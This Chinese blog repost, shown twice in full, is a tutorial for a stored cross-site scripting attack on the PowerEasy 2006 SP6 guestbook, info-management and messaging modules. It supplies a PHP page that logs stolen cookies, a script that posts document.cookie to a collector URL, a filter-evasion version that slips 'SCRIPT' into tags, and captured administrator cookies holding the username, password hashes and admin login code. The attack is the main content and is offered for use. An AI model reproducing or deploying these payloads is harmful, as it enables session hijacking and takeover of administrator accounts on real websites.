动易2006_SP6跨站
2007-08-18 09:17
141 查看
鬼仔注:从7j那里看到的,并且有7j写的接收页面。
7j:没有找到他说的接收页面,只有自已用PHP写个了
<?
$filename = date("Ymd").".txt";
$time = @date("Y年m月d号H点i分s秒",time());
$cookie = $_POST['cookie'];
$url = $_POST['url'];
$hostname = $_POST['hostname'];
if ($cookie <> ""){
$tmp = fopen($filename,"a+");
fwrite($tmp,"地址:".$url."\n主机:".$hostname."\nCookie:".$cookie."\nIP:".$_SERVER['REMOTE_ADDR']."\n".$time."\n");
fclose($tmp);
}
?>
来源:′失眠ヤ夜 's blog
漏洞主要出现在“雁过留声(留言板)”、“信息管理”和“短消息”里,这里以留言板为例
下面我们来测试一下漏洞
打开留言板,选择源代码模式签写留言
审核发表状态下钓到管理员Cookies的几率比较到
我们先来试试一些文字
输入<>未被过滤
输入<script>过滤成<>,不好意思 刚才弄错了
输入scrSCRIPTipt会过滤成script(去掉了中间的大写SCRIPT)
看 漏洞出来了
也就是说它会把"Script"字符过滤掉,但是只过滤一次,给了我们可乘之机
(iframe标签你可以自己测试)
下面是一个获得Cookies的代码,会把Cookies提交到http://localhost/cookies/cookies.asp,相关的代码我会打包到教程里
<form name=redir action=http://localhost/cookies/cookie.asp method=post>
<input type=hidden name=cookie>
<input type=hidden name=url>
<input type=hidden name=hostname>
</form>
<script>redir.cookie.value=document.cookie;redir.url.value=location.href;redir.hostname.value=location.hostname;redir.submit();</script>
现在我们在一些可能的敏感字符中插入SCRIPT字符,以防我们的代码被过滤
更改后的代码如下:
<FOSCRIPTRM naSCRIPTme=redSCRIPTir actSCRIPTion=http://locaSCRIPTlhost/cooSCRIPTkies/cooSCRIPTkie.asp>
<input type=hidSCRIPTden name=coSCRIPTokie>
<input type=hidSCRIPTden name=uSCRIPTrl>
<input type=hidSCRIPTden name=hoSCRIPTstname>
</forSCRIPTm>
<scrSCRIPTipt>
rSCRIPTedir.cooSCRIPTkie.valSCRIPTue=
docSCRIPTument.coSCRIPTokie;redSCRIPTir.urSCRIPTl.vaSCRIPTlue=
locSCRIPTation.hrSCRIPTef;redSCRIPTir.hostnamSCRIPTe.vaSCRIPTlue=
locatiSCRIPTon.hostnSCRIPTame;redSCRIPTir.subSCRIPTmit();</scrSCRIPTipt>
现在我们发表留言
看 数据库里的代码是我们修改前的代码
现在以管理员身份登录
现在我们保存cookies的数据库是空的
这是我发送的钓Cookies的网页
好的,现在代码已经执行,管理员的Cookies已经被我们钓到了
我们来看一下
ASPSESSIONIDQCRQQSAT=LCNFLHOBLBPHEJJMHJDPDMGF; localhostpowereasy=LastPassword=
4P263W7JiD425kyd&UserName=admin&AdminLoginCode=
PowerEasy2006&AdminName=admin&UserPassword=469e80d32c0559f8&RndPassword=
4P263W7JiD425kyd&AdminPassword=469e80d32c0559f8
怎么样?得到了吧?
里面有管理员的用户名、密码,和管理认证码
信息管理和短消息也可以如法炮制,具体方法我就不多说了
在这里说一下 拿到源码后先要修改一下设置,conn.asp里的数据库路径要改一下
还有test.htm里的URL也要改一下,可以用它做测试
7j:没有找到他说的接收页面,只有自已用PHP写个了
<?
$filename = date("Ymd").".txt";
$time = @date("Y年m月d号H点i分s秒",time());
$cookie = $_POST['cookie'];
$url = $_POST['url'];
$hostname = $_POST['hostname'];
if ($cookie <> ""){
$tmp = fopen($filename,"a+");
fwrite($tmp,"地址:".$url."\n主机:".$hostname."\nCookie:".$cookie."\nIP:".$_SERVER['REMOTE_ADDR']."\n".$time."\n");
fclose($tmp);
}
?>
来源:′失眠ヤ夜 's blog
漏洞主要出现在“雁过留声(留言板)”、“信息管理”和“短消息”里,这里以留言板为例
下面我们来测试一下漏洞
打开留言板,选择源代码模式签写留言
审核发表状态下钓到管理员Cookies的几率比较到
我们先来试试一些文字
输入<>未被过滤
输入<script>过滤成<>,不好意思 刚才弄错了
输入scrSCRIPTipt会过滤成script(去掉了中间的大写SCRIPT)
看 漏洞出来了
也就是说它会把"Script"字符过滤掉,但是只过滤一次,给了我们可乘之机
(iframe标签你可以自己测试)
下面是一个获得Cookies的代码,会把Cookies提交到http://localhost/cookies/cookies.asp,相关的代码我会打包到教程里
<form name=redir action=http://localhost/cookies/cookie.asp method=post>
<input type=hidden name=cookie>
<input type=hidden name=url>
<input type=hidden name=hostname>
</form>
<script>redir.cookie.value=document.cookie;redir.url.value=location.href;redir.hostname.value=location.hostname;redir.submit();</script>
现在我们在一些可能的敏感字符中插入SCRIPT字符,以防我们的代码被过滤
更改后的代码如下:
<FOSCRIPTRM naSCRIPTme=redSCRIPTir actSCRIPTion=http://locaSCRIPTlhost/cooSCRIPTkies/cooSCRIPTkie.asp>
<input type=hidSCRIPTden name=coSCRIPTokie>
<input type=hidSCRIPTden name=uSCRIPTrl>
<input type=hidSCRIPTden name=hoSCRIPTstname>
</forSCRIPTm>
<scrSCRIPTipt>
rSCRIPTedir.cooSCRIPTkie.valSCRIPTue=
docSCRIPTument.coSCRIPTokie;redSCRIPTir.urSCRIPTl.vaSCRIPTlue=
locSCRIPTation.hrSCRIPTef;redSCRIPTir.hostnamSCRIPTe.vaSCRIPTlue=
locatiSCRIPTon.hostnSCRIPTame;redSCRIPTir.subSCRIPTmit();</scrSCRIPTipt>
现在我们发表留言
看 数据库里的代码是我们修改前的代码
现在以管理员身份登录
现在我们保存cookies的数据库是空的
这是我发送的钓Cookies的网页
好的,现在代码已经执行,管理员的Cookies已经被我们钓到了
我们来看一下
ASPSESSIONIDQCRQQSAT=LCNFLHOBLBPHEJJMHJDPDMGF; localhostpowereasy=LastPassword=
4P263W7JiD425kyd&UserName=admin&AdminLoginCode=
PowerEasy2006&AdminName=admin&UserPassword=469e80d32c0559f8&RndPassword=
4P263W7JiD425kyd&AdminPassword=469e80d32c0559f8
怎么样?得到了吧?
里面有管理员的用户名、密码,和管理认证码
信息管理和短消息也可以如法炮制,具体方法我就不多说了
在这里说一下 拿到源码后先要修改一下设置,conn.asp里的数据库路径要改一下
还有test.htm里的URL也要改一下,可以用它做测试
相关文章推荐
- 动易2006标签大全
- 动易2006版对DPO接口支持细节
- 动易2005、2006版常见错误号的原因分析及解决方法
- 动易常见错误号的原因分析及解决方法(2005、2006版)
- 动易2006_SP6最新漏洞得到管理员密码(转)
- 2006第三届全国动易设计应用大赛作品欣赏
- 动易2006最新漏洞公告(2007-2-15)
- Shanghai 2006 / UVa 1382 Distant Galaxy (枚举&扫描&动态维护)
- mysql导入数据库报错Error Code: 2006
- [ZJOI2006 物流运输trans] 最短路径 DP SPFA
- mysql导入报 Error Code: 2006 - MySQL 服务器已离线错误
- [zz]cpuspec 2006编译和使用方法
- 2006——求奇数的乘积
- 【题解】[scoi2006]zh_tree
- BZOJ 1861: [Zjoi2006]Book 书架
- 1197: [HNOI2006]花仙子的魔法 - BZOJ
- 1050 [HAOI2006] 旅行comf 题解
- 【bzoj1724】[Usaco2006 Nov]Fence Repair切割木板
- [hdu 2006] 求奇数的乘积
- poj3251 & usaco 月赛 2006 Big Square 题解